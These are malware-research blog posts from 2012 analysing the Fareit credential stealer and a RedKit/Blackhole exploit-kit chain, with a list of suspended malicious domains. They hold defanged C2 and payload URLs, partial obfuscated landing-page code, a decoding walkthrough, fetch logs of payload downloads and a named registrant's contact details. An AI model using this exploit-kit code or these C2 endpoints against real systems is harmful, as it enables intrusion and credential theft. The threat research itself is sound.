↑Strong accusation, I know, but the data said so.. Can't wait to hear the explanation from this person..

#MalwareMustDie!

The Crime Still Goes On: Trojan Fareit Credential Stealer - New Server, Same Group, Same Game (via BHEK/Cridex)

$
0
0

As per posted A WEEK AGO here -->>[Prev.Post] that Crime Group STILL infects victims.
The infector concepts and binary works is exactly the same as previous,

Infection Source Summary & Trojan Communication Info


Spam infector:
URL: h00p://www.irwra.com/wp-content/themes/mantra/uploads/cpa_inform.htm
Server: Apache, WordPress
IP: 50.116.98.44

Blackhole:
Landing: h00p://latticesoft.net/detects/continues-little.php
Server: nginx/1.3.3
Date: Fri, 21 Dec 2012 18:44:29 GMT
Content-Type: text/html
X-Powered-By: PHP/5.3.14
IP: 59.57.247.185

Trojan Cridex (payload) download url:
h00p://latticesoft.net/detects/continues-little.php?zf=30:2v:1f:1j:30&ge=1n:2w:1i:1j:1o:1i:1g:2v:1m:1m&l=1k&iw=z&hf=d
Trojan Fareit Download Source:
h00p://94.73.129.120:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://188.120.226.30:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://188.40.109.204:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://204.15.30.202:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://59.90.221.6:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://69.64.89.82:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://78.28.120.32:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://74.117.107.25:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://174.142.68.239:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://23.29.73.220:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://81.93.250.157:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://188.212.156.170:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://173.203.102.204:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://84.22.100.108:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
*) With all Proxy's Port/Server: 8080 / nginx/1.0.10
Trojan Fareit Stealer Download PoC is as example below:
POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 94.73.129.120:8080
Content-Length: 347
Connection: Keep-Alive
Cache-Control: no-cache
...?f/.....0N}a.9.Je...U;0..
:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sat, 22 Dec 2012 08:29:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Trojan Fareit Callbacks IP:
h00p://132.248.49.112:8080/asp/intro.php
h00p://113.130.65.77:8080/asp/intro.php
h00p://203.113.98.131:8080/asp/intro.php
h00p://110.164.58.250:8080/asp/intro.php
h00p://200.108.18.158:8080/asp/intro.php
h00p://207.182.144.115:8080/asp/intro.php
h00p://148.208.216.70:8080/asp/intro.php
h00p://203.172.252.26:8080/asp/intro.php
h00p://202.6.120.103:8080/asp/intro.php
h00p://203.146.208.180:8080/asp/intro.php
h00p://207.126.57.208:8080/asp/intro.php
h00p://203.80.16.81:8080/asp/intro.php
h00p://202.180.221.186:8080/asp/intro.php
CNC is 62.76.177.51, PoC:
// Credentials sent CnC panel
var adminPanelLocation =
'h00p://62.76.177.51/if_Career/';

//Data Modify Process:
h00p://62.76.177.123/mx/2B/in/cp.php?h=8

// Phishing Credentials urls
h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=chase
h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=wellsfargo
h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=bankofamerica
CnC Passwords(reversed from Trojan Fareit):
phpbb      john316      pass        slayer     
qwerty richard aaaaaa wisdom
jesus blink182 amanda praise
abc123 peaches nothing zxcvbnm
letmein cool ginger samuel
test flower mother mike
love scooter snoopy dallas
password1 banana jessica green
hello james welcome testtest
monkey asdfasdf pokemon maverick
dragon victory iloveyou1 onelove
trustno1 london mustang david
iloveyou 123qwe helpme mylove
shadow startrek justin church
christ george jasmine friend
sunshine winner orange god
master maggie testing destiny
computer trinity apple none
princess online michelle microsoft
tigger 123abc peace bubbles
football chicken secret cocacola
angel junior grace jordan23
jesus1 chris william ilovegod
whatever passw0rd iloveyou2 football1
freedom austin nicole loving
killer sparky muffin nathan
asdf admin gateway emmanuel
soccer merlin fuckyou1 scooby
superman google asshole fuckoff
michael friends hahaha sammy
cheese hope poop maxwell
internet shalom blessing jason
joshua nintendo blahblah john
fuckyou looking myspace1 1q2w3e4r
blessed harley matthew baby
baseball smokey canada red123
starwars joseph silver blabla
purple lucky robert prince
jordan digital forever qwert
faith thunder asdfgh chelsea
summer spirit rachel angel1
ashley bandit rainbow hardcore
buster enter guitar dexter
heaven anthony peanut saved
pepper corvette batman hallo
hunter hockey cookie jasper
lovely power bailey danielle
andrew benjamin soccer1 kitten
thomas iloveyou! mickey cassie
angels 1q2w3e biteme stella
charlie viper hello1 prayer
daniel genesis eminem hotdog
jennifer knight dakota windows
single qwerty1 samantha mustdie
hannah creative compaq gates
qazwsx foobar diamond billgates
happy adidas taylor ghbdtn
matrix rotimi forum gfhjkm hgTYDOMium

Analysis Summary & Research Materials

This time I dump every memory of Trojan Fareit in txt here-->>[PASTEBIN]↑So you can see which FTP, File, POP/SMTP Credentials data's licked & grabbed - as evidence of this evil stealer crime. Additionally see the Fareit Trojan's config here -->>[PASTEBIN]↑You can confirm targeted online banks info + phishing html codes these actors used. There is slight BHEK changes in PluginDetect Obfuscated Code (Landing Page), I cracked manually with wrote GUIDANCE to decode here -->>[PASTEBIN]PluginDetect before -->>[PASTEBIN]& after decoded-->>[PASTEBIN] Payload binary static & dynamic analysis text(a quicky) -->>[PASTEBIN]Sample download is here -->>[MEDIAFIRE]Captures data is here (PCAP, RegShot, MEMShot, etc)-->>[MEDIAFIRE]

Account Phishing Act by current version Trojan

Hello Citi Account Online! Same as previous: Chase Bank! This time BANK OF AMERICA!!!

PoC of all possible Email Credentials Also Grabbed

In the previous case, I have strong request to check not only http/ftp/server login, but E-Mail credential. Here we go:
POP3_Password2
SMTP_Password2
IMAP_Password2
HTTPMail_Password2
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Mail
Software\Microsoft\Windows Mail
Software\RimArts\B2\Settings
DataDir
DataDirBak
Mailbox.ini
Software\Poco Systems Inc
Path
\PocoSystem.ini
Program
DataPath
accounts.ini
\Pocomail
Software\IncrediMail
EmailAddress
Technology
PopServer
PopPort
PopAccount
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
account.cfg
account.cfn
\BatMail
\The Bat!
Software\RIT\The Bat!
Software\RIT\The Bat!\Users depot
Working Directory
ProgramDir
Count
Default
Dir #%d
SMTP Email Address
SMTP Server
POP3 Server
POP3 User Name
SMTP User Name
NNTP Email Address
NNTP User Name
NNTP Server
IMAP Server
IMAP User Name
Email
HTTP User
HTTP Server URL
POP3 User
IMAP User
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Port
SMTP Port
IMAP Port
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTP Password
SMTP Password
Software\Microsoft\Internet Account Manager\Accounts
Identities
Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Software\Microsoft\Internet Account Manager
Outlook
\Accounts
identification
identitymgr
inetcomm server passwords
outlook account manager passwords identities

Virus Total Detection Ratio

Landing Page: (3/45) ---->>[VirusTotal]Trojan Cridex Downloader: (15/44) ---->>[VirusTotal]Trojan Fareit Credential Stealer: (4/45) ---->>[VirusTotal]

PoC / Analysis ScreenShots

Malware processes: Payload after self copied(dropped) into %AppData%\ Network HTTP Traffic captured: Need to fix the binary before reversing properly...
//Very annoying anti-reverse....
: : :
0x00003cf2 (01) 47 INC EDI
0x00003cf3 (01) 5c POP ESP
0x00003cf4 (05) a9 2835b437 TEST EAX, 0x37b43528
0x00003cf9 (03) 0ff2f8 PSLLD MM7, MM0
0x00003cfc (01) 4b DEC EBX
0x00003cfd (01) 95 XCHG EBP, EAX
0x00003cfe (02) b2 f9 MOV DL, 0xf9
0x00003d00 (01) ef OUT DX, EAX
0x00003d01 (01) 51 PUSH ECX
0x00003d02 (01) ac LODSB
0x00003d03 (01) 46 INC ESI
0x00003d04 (02) 71 77 JNO 0x00003d7d ; 1
0x00003d04 --------------------------------------------------
0x00003d06 (02) 72 71 JB 0x00003d79 ; 2
0x00003d06 --------------------------------------------------
0x00003d08 (02) 77 72 JA 0x00003d7c ; 3
0x00003d08 --------------------------------------------------
0x00003d0a (02) 71 77 JNO 0x00003d83 ; 4
0x00003d0a --------------------------------------------------
0x00003d0c (02) 72 71 JB 0x00003d7f ; 5
: : : : : :
3CE8 50 44 44 33 D7 24 91 FF 62 27 47 5C A9 28 35 B4 PDD3.$..b'G..(5.
3CF8 37 0F F2 F8 4B 95 B2 F9 EF 51 AC 46 71 77 72 71 7...K....Q.Fqwrq
3D08 77 72 71 77 72 71 77 72 71 77 72 71 77 72 71 77 wrqwrqwrqwrqwrqw // This qwrqwr :-(((
3D18 72 71 77 72 71 77 72 71 77 72 71 77 72 71 77 72 rqwrqwrqwrqwrqwr
3D28 71 77 72 71 77 72 71 77 72 71 77 72 71 77 72 71 qwrqwrqwrqwrqwrq
3D38 77 72 71 77 72 71 77 72 71 77 72 71 77 72 71 77 wrqwrqwrqwrqwrqw
3D48 72 71 77 72 71 77 72 71 77 72 71 77 72 71 77 72 rqwrqwrqwrqwrqwr
3D58 71 77 72 71 77 72 71 77 72 71 77 72 71 77 72 71 qwrqwrqwrqwrqwrq
: : :

PoC of the same group as previous case

Seriously, it uses the same NS server registered by same person..
// latticesoft.net 
;; QUESTION SECTION:
;latticesoft.net. IN ANY

;; ANSWER SECTION:
latticesoft.net. 900 IN A 59.57.247.185
latticesoft.net. 900 IN SOA ns1.amishshoppe.net. . 1356192301 60 120 1048576 900
latticesoft.net. 900 IN NS ns2.amishshoppe.net.
latticesoft.net. 900 IN NS ns1.amishshoppe.net.

;; AUTHORITY SECTION:
latticesoft.net. 900 IN NS ns2.amishshoppe.net.
latticesoft.net. 900 IN NS ns1.amishshoppe.net.

;; ADDITIONAL SECTION:
ns1.amishshoppe.net. 3600 IN A 209.140.18.37
ns2.amishshoppe.net. 3600 IN A 211.27.42.138

//PoC that currently infector domain is in service:
a.root-servers.net. (198.41.0.4)
|\___ i.gtld-servers.net [net] (192.43.172.30)
| |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
| \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) Got authoritative answer
|\___ l.gtld-servers.net [net] (192.41.162.30)
| |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
| \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
|\___ m.gtld-servers.net [net] (192.55.83.30)
| |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
| \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
|\___ k.gtld-servers.net [net] (192.52.178.30)
| |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
| \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
|\___ h.gtld-servers.net [net] (192.54.112.30)
| |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
| \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
|\___ b.gtld-servers.net [net] (2001:0503:231d:0000:0000:0000:0002:0030) Not queried
|\___ b.gtld-servers.net [net] (192.33.14.30)
| |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
| \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
|\___ e.gtld-servers.net [net] (192.12.94.30)
| |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
| \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
|\___ j.gtld-servers.net [net] (192.48.79.30)
| |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
| \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
|\___ a.gtld-servers.net [net] (2001:0503:a83e:0000:0000:0000:0002:0030) Not queried
|\___ a.gtld-servers.net [net] (192.5.6.30)
| |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
| \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
|\___ g.gtld-servers.net [net] (192.42.93.30)
| |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
| \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
|\___ f.gtld-servers.net [net] (192.35.51.30)
| |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
| \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
|\___ c.gtld-servers.net [net] (192.26.92.30)
| |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
| \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
\___ d.gtld-servers.net [net] (192.31.80.30)
|\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
\___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)

//Historical/pDNS related IP-Domain Info:
eaglepointecondo.org A 59.57.247.185
latticesoft.net A 59.57.247.185
eaglepointecondo.biz A 59.57.247.185
sessionid0147239047829578349578239077.pl A 59.57.247.185

// Check AXFR (see whether anyone can changed records w/2ndary DNS)
]$ nslookup
> set type=axfr
> amishshoppe.net
; Transfer failed.
Server: 8.8.8.8
Address: 8.8.8.8#53

// WHOIS Database of DNS Service Domain....

Domain Name: AMISHSHOPPE.NET
Registrar: REGISTER.COM, INC.
Whois Server: whois.register.com
Referral URL: http://www.register.com
Name Server: NS1.AMISHSHOPPE.NET
Name Server: NS2.AMISHSHOPPE.NET
Status: clientTransferProhibited
Updated Date: 15-nov-2012
Creation Date: 15-nov-2012
Expiration Date: 15-nov-2013

// Registrant Database Checks...
Registrant:

Steve Burandt
0n430 Peter Rd
Winfield, IL 60190
US
Phone: +1.6304626711
Email: solaradvent@yahoo.com

Registrar Name....: Register.com
Registrar Whois...: whois.register.com
Registrar Homepage: www.register.com

Domain Name: amishshoppe.net
Created on..............: 2012-11-15
Expires on..............: 2013-11-15

Administrative Contact:
Steve Burandt
0n430 Peter Rd
Winfield, IL 60190
US
Phone: +1.6304626711
Email: solaradvent@yahoo.com

Technical Contact:
Registercom
Domain Registrar
12808 Gran Bay Pkwy
West Jacksonville, FL 32258
US
Phone: +1.9027492701
Email: domainregistrar@register.com

DNS Servers:
ns2.amishshoppe.net
ns1.amishshoppe.net

#MalwareMustDie

Announce of Multiple Malware Domains Deactivation Progress - The "Operation Tango Down"

$
0
0
To all friends in Malware fighting area and all of the supporter and readers to our MalwareMustDie blog. We have a good news. Our fight against malwares leaps into a next brighter stage. Since all of posted malware cases in MalwareMustDie was not only analyzed, decoded, exposed its infectors layers to its CnC, but through the persistent dedication of our members, we also reported our cases to the authority accordingly and gain a good collaboration with them to receive a cooperation for deactivating of malware domains and its related CnC and infectors .

The established cooperation are well resulted. Herewith, from now on, we are releasing regular series of posts for the malware domains deactivation result upon cases we investigate and follow. The report will contain the list of blocked/suspended Domain Names, IPs, Malicious DNS servers, the bad actor's Registration ID, etc.

We called this operation as "Tango Down", managed by several project leaders. And here is the first official post of this series report.

In this report we'd like to announce two achievements we had during Christmas. The report will be continued in the second part with next detail on the currently on-going process of "Tango Down".

Here's the details:


1. Deactivation of severe .RU malware infector domains


Based on the posted analysis on below posted links (click the numbers to see details)
[1] Analysis of Fake Facebook Notification redirect to BHEK & infecting Cridex Malware
[2] Spam "You have been sent a file" + WordPress Redirector ...
[3] ake Facebook Notification Leads to Cridex/PasswordStealer
[4] "More" Spam to BHEK to Cridex; How they define, grab & send the credentials
[5] Getting more "Personal" & Deeper into Cridex...
[6] The Crime Still Goes On: Trojan Fareit Credential Stealer
We really appreciated the wonderful cooperation received from CERT-GIB - Computer Security Incident Response Team by Group-IB, the effort resulted to a successful deactivated below listed 32 infector domains, which are verdict-ed and proved its relation to the Blackhole Exploit Kit crime users who infect the victims using the Cridex Trojan to drop credentials stealer by using Trojan Fareit.:
genevaonline.ru
pelamutrika.ru
aliamognoa.ru
ahiontota.ru
anifkailood.ru
podarunoki.ru
aseniakrol.ru
publicatorian.ru
pitoniamason.ru
amnaosogo.ru
aviaonlolsio.ru
dimarikanko.ru
adanagenro.ru
awoeionfpop.ru
aofngppahgor.ru
aviaonlolsio.ru
ganalionomka.ru
publicatorian.ru
francese.ru
cinemaallon.ru
leberiasun.ru
somaliaonfloor.ru
panamechkis.ru
apendiksator.ru
angelaonfl.ru
adanagenro.ru
antariktika.ru
aliamognoa.ru
apensiona.ru
anifkailood.ru
apolinaklsit.ru
sectantes-x.ru
Following the above achievement, we again thank you for the wonderful collaboration of CERT-GIB, with our front member @it4sec, the other cases posted as per below (click the number for details):
[1] On Daily Basis: DNS switch as anti-forensics feature in Malware
[2] VT Comment: FakeAV's (SUPERAntiSpyware.com) trojan downloader
After being analyzed & proved as malware with PseudoRandom Domain/DGA callback to motherships which lead to a total 92 of .RU domains, the below list of domains was also successfully suspended, and I just confirmed its deactivation:
 opldkflyvlkywuec.ru
bdprvpxdejpohqpt.ru
ddkudnuklgiwtdyw.ru
eefysywrvkgxuqdf.ru
qphhsudsmeftdaht.ru
yayfefhrwawquwcw.ru
knauycqgsdhgbwjo.ru
mouwwvcwwlilnxub.ru
noqzuukouyfuyrmd.ru
zatiscwwtipqlycd.ru
rpckbgrziwbdrmhr.ru
kzxrowftdocgyghs.ru
ifrhgnqeeotnzrmz.ru
xmwettbvtbhvrjuo.ru
ymrhcvphevonympo.ru
lavvckpordclbduy.ru
sqwlonyduvpowdgy.ru
febcbuyswmishvpl.ru
hfveiooumeyrpchg.ru
ifrhgnqeeotnzrmz.ru
uqspvdwyltgcyhft.ru
wzbdwenwshfzglwt.ru
lccwpflcdjrdfjib.ru
lccwpflcdjrdfjib.ru
nvjgyermzsmynaeq.ru
owekhoeuhmdiehrw.ru
bkhyiqitpoxewhmt.ru
iblpdiqdmmsbnuxb.ru
ummxjwieppswcnrg.ru
vmibswhnpqhqwyih.ru
xndfbivuonkxfxrq.ru
kbgsbqjugdqrgtdw.ru
cldcrgtnuwvgnbfd.ru
tykvyflnjhbnqpnr.ru
gmokuosvnbkshdtd.ru
imjosxuhbcdonrco.ru
jnfrqmekhoevppvw.ru
vygzhvfiuommkqfj.ru
elxegvkalqvkyoxc.ru
pwyloytoagndnrex.ru
rxupwhkznihnxzqx.ru
sxpskxdgoczvcjgp.ru
flthmyjeuhdygshf.ru
nbqypqrjiqxlfvdj.ru
yrxysfyekjfooere.ru
lfbovcaitdrjmkbe.ru
mfwqdxgdpwiojrjp.ru
ogrtlmpkqtwmweff.ru
atsihkcljrqlzvku.ru
fjgtmicxtlxynlpf.ru
ifrhgnqeeotnzrmz.ru
upmqpwyndzwzmmwy.ru
vqhtwlshzzqsltcp.ru
iekiyvsbtyozmmwy.ru
ctolfpcqldrvxvml.ru
hvuwhwqtoyidfrjg.ru
gvztjrlasdnlbiei.ru
uitjsdpvrfgfdhff.ru
wiombejwxrddpkkx.ru
jwqbrhwarzjrglbn.ru
dujovshpvbxgrikw.ru
pgmxykzlqomziebp.ru
qhibjmjlnpyovmbn.ru
shderldqiqdtdcmu.ru
fufsbovwfzjumtle.ru
fjgtmicxtlxynlpf.ru
fqyyxagzkrpvxtki.ru
rccjvgsgffokiwze.ru
sdxkjaophbtufumx.ru
tdsorylshsxjeawf.ru
gqtcxunxhyujqjkf.ru
oblcasnhxbbocpfj.ru
bpnqmxkpxxgbdnby.ru
cpittmwbqtjrjpql.ru
dpewaddpoewiycnj.ru
pchgijctfprxhnje.ru
hrpgglxvqwjesffr.ru
zfyafrjmmajqfvbh.ru
lsbppxhgckolsnap.ru
bhujzorkulhkpwob.ru
eilqnjkoytyjuchn.ru
qtmyeslmsoxkjbku.ru
jrkjelzwleadyxsd.ru
venrfhmthwpqlqge.ru
ksgmckchdppqeicu.ru
tmrtbcienxrbnsjc.ru
xeeypppxswpquvrf.ru
haqmuqqukywrcxfa.ru
wejungvnykczyjam.ru
fzsirujgdbvabrjm.ru
eyxejlabqaytqmjx.ru
rlvqmipovrqbmvqd.ru
These achievements was made by good collaboration between good guys and good communication with the people with the same strong willing to cleanup our beloved internet communication media from malwares, and ending up in a good result. We thank you very much to CERT-GIB for a tireless and wonderful work, to @it4sec his team and all of MalwareMustDie members involved to make this project runs & success.

The collaboration is continuing for the bigger portion of target for the near future. We will post the next result in the next series.

2. The shutdown of Malware Domains served by Malicious DNS

As per announced previously in the twitter, we exposed the other result of "Tango Down" operation, which aimed multiple infection of multiple scheme of malwares and exploit kit (mostly Blackhole Exploit Kits), which under lead by different member (@essachin).

The deactivated of the malware domains can be done through the collaboration between Domain Registrar related to the DNS service used for the malicious act. Previously we announced 140+ domains are suspended,


..but it looks like the list will be added by another NEW 120 domains shortly.
The current project's leader will post the analysis details in his blog which I will announce its link additionally here.
The latest result of this project is maintained here--->>[PASTEBIN]

(to be continued)

#MalwareMustDie!

What happened if Red Kit Exploit Kit team up with BlackHole EK? = Tripple payload + infection of Khelios!

$
0
0
It is the last crusade of the year 2012, crusade was started by the lead of RedKit. We heard that RedKit is going into a heavy customization, so it is good for the new year's adventure as the "different"challenge than BHEK.

Sadly, I am in hospital writing this, on duty of waiting for my Dad to be transferred to other place, so I just depend on my Note PC to do analyze this, please bear these initial result, I will add it with binary analysis details after new year. Unfortunately, this case is longer than I expected, indeed it is good to kill my waiting time.

So here we go, the RedKit Exploit Kit to BHEK with tripple payload downloads case, ending up with Khelios :-)

Infector URL:

h00p://optik-welter.de/hcwf.htm
using the google as referer+IE java headers, we fetched it:
--17:58:21--  h00p://optik-welter.de/hcwf.htm
=> `hcwf.htm'
Resolving optik-welter.de... seconds 0.00, 82.165.104.24
Caching optik-welter.de => 82.165.104.24
Connecting to optik-welter.de|82.165.104.24|:80... seconds 0.00, connected.
GET /hcwf.htm HTTP/1.0

Referer: http://www.google.com/url?..
User-Agent: MalwareMustDie painted your front door *pink*
Accept: */*
Host: optik-welter.de
Connection: Keep-Alive
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Date: Sun, 30 Dec 2012 08:58:22 GMT
Server: Apache
X-Powered-By: PHP/4.4.9
Content-Length: 12996
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Content-Type: text/html
---response end---
200 OK
17:58:23 (41.24 KB/s) - `hcwf.htm' saved [12996/12996]
let's see the insides:
<html><body><td>Ydoanunan onontothmeiun we i de idedovoitthcode..
ive="h00p://optik-welter・de/332.jar" code="Runs.class"><param n..
obapoptdellobapophh0llobapop.qvllobapop3ytllobapop3kzllobapop/f..
bapoprxkllobapopey5llobapoptrrllobapoplwallobapope5illobapopwg4..
apoptg9llobapoppmkllobapopo2tllobapop/lrllobapop/olllobapop:36l..
pophwlllobapop"></applet><applet archive="h00p://optik-welter.d..
ame="elitken" value="lv9llobapopm0kllobapopt0vllobapophczllobap..
gllobapopezlllobapopdi1llobapop.l8llobapoprp1llobapope3pllobapo..
llobapop-iallobapopkkdllobapopi3kllobapoptyillobapoppydllobapop..
lobapoppdallobapopt82llobapoptlcllobapophk5llobapop"></applet>..
var jsou = "src";
var cxhy=document.createElement("iframe");
function dettq()

document.body.appendChild(cxhy);
cxhy.setAttribute(jsou,"h00p://optik-welter・de/
}
var Ganni={version:"0.7.7",rDate:"04/11/2012",n..
eturn function(){c(b,a)}},isDefined:function(b){return typeof b ..
turn(/array/i).test(Object.prototype.toString.call(b))},isFunc:..
n"},isString:function(b){return typeof b=="string"},isNum:funct..
trNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},g..
egx:/[\.\_,-]/g,getNum:function(b,c){var d=this,a=d.isStrNum(b)..
umRegx).exec(b):null;return a?a[0]:null},compareNums:function(h..
:
: (snipped)
:
Ganni.initScript();

flopp=Ganni.getVersion("AdobeReader");
if(flopp)

flopp=flopp.split(',');
if (((3+1) > flopp[1] && (8+1)==flopp[0]) || ((2+1) > flopp[1] && (7+1)==flopp[0]))

cxhy.setAttribute("width",4);
cxhy.setAttribute("height",12);
dettq();
}
}</script></body></html>
↑We see the plugin detect old version (0.7.7) modified for the evil purpose.. In the plugin detect script we can easily see some suspicious malware infector downloads urls like:
h00p://optik-welter.de/332.jar
h00p://optik-welter.de/887.jar
h00p://optik-welter.de/987.pdf
↑It is good to try to download these, go ahead to try, but I prefer to go straightly to payload.

The Sharing of RedKit EK Infector Source/Code

The complete landing page HTML code is pasted here -->>[PASTEBIN]
The plugin detect 0.7,7 code is in here -->>[PASTEBIN]

Guide to Crack the RedKit Landing Page Code (to fetch the 1st payload)

In the landing page there's the applet code that can lead us to the payload. The below applet code is one of the key to fetch payload:
<applet archive="h00p://optik-welter.de/332.jar" code="Runs.class">
<param name="elitken" value="lrkllobapopm0illobapoptdellobapophh0llobapop.qvllobapop3ytllobapop3kzllobapop/f0llobapope8xllobapopdxqllobapop.hkllobapoprxkllobapopey5llobapoptrrllobapoplwallobapope5illobapopwg4llobapop-adllobapopkyyllobapopil8llobapoptg9llobapoppmkllobapopo2tllobapop/lrllobapop/olllobapop:36llobapoppx2llobapopt4gllobapoptgqllobapophwlllobapop">
</applet>
let's take the parameter elitken's value:
 lrkllobapopm0illobapoptdellobapophh0llobapop.qvllobapop3ytllobapop3kzllobapop/f0
llobapope8xllobapopdxqllobapop.hkllobapoprxkllobapopey5llobapoptrrllobapoplwa
llobapope5illobapopwg4llobapop-adllobapopkyyllobapopil8llobapoptg9llobapoppmk
llobapopo2tllobapop/lrllobapop/olllobapop:36llobapoppx2llobapopt4gllobapoptgq
llobapophwlllobapop
You see the the repetition of "llobapop" strings? It is actually a delimiter.
So let's start eliminate them, then we get below sets of garbled words:
lrk m0i tde hh0 .qv 3yt 3kz /f0 e8x dxq .hk rxk ey5 trr lwa 
e5i wg4 -ad kyy il8 tg9 pmk o2t /lr /ol :36 px2 t4g tgq hwl
To decode this, we noticed the simple trick by taking the first character in each words & gather those first character backward, we'll get the download url:
h00p://optik-welter.de/33.html

Payload 1

The above url is actually a payload's url. 33.html is actually a php script to feed you with payload binary file setup.exe, as per below PoC:
@unixfreaxjp /malware]$ myfetch h00p://optik-welter.de/33.html

--18:16:43-- h00p://optik-welter.de/33.html
=> `33.html'
Resolving optik-welter.de... seconds 0.00, 82.165.104.24
Caching optik-welter.de => 82.165.104.24
Connecting to optik-welter.de|82.165.104.24|:80... seconds 0.00, connected.

GET /33.html HTTP/1.0
Referer: h00p://www.google.com/..
User-Agent: #MalwareMustDie is hammering your door with nails.
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: optik-welter.de
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Date: Sun, 30 Dec 2012 09:16:44 GMT
Server: Apache
X-Powered-By: PHP/4.4.9
Expires: Mon, 20 Aug 2002 02:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
Content-Transfer-Encoding: binary
Content-Disposition: inline; filename=setup.exe
Content-Length: 41472
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Content-Type: application/octet-stream
:
200 OK
18:16:46 (37.76 KB/s) - `33.html' saved [41472/41472]

@unixfreaxjp /malware]$ ls -alF 33.html
-rwxr--r-- 1 rik wheel 41472 Dec 30 18:16 33.html*

@unixfreaxjp /malware]$ mycheckbin ./33.html
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 50 45 00 00 4C 01 07 00 5C 82 DF 50 00 00 00 00 PE..L......P....
: : :
snipped....snipped..
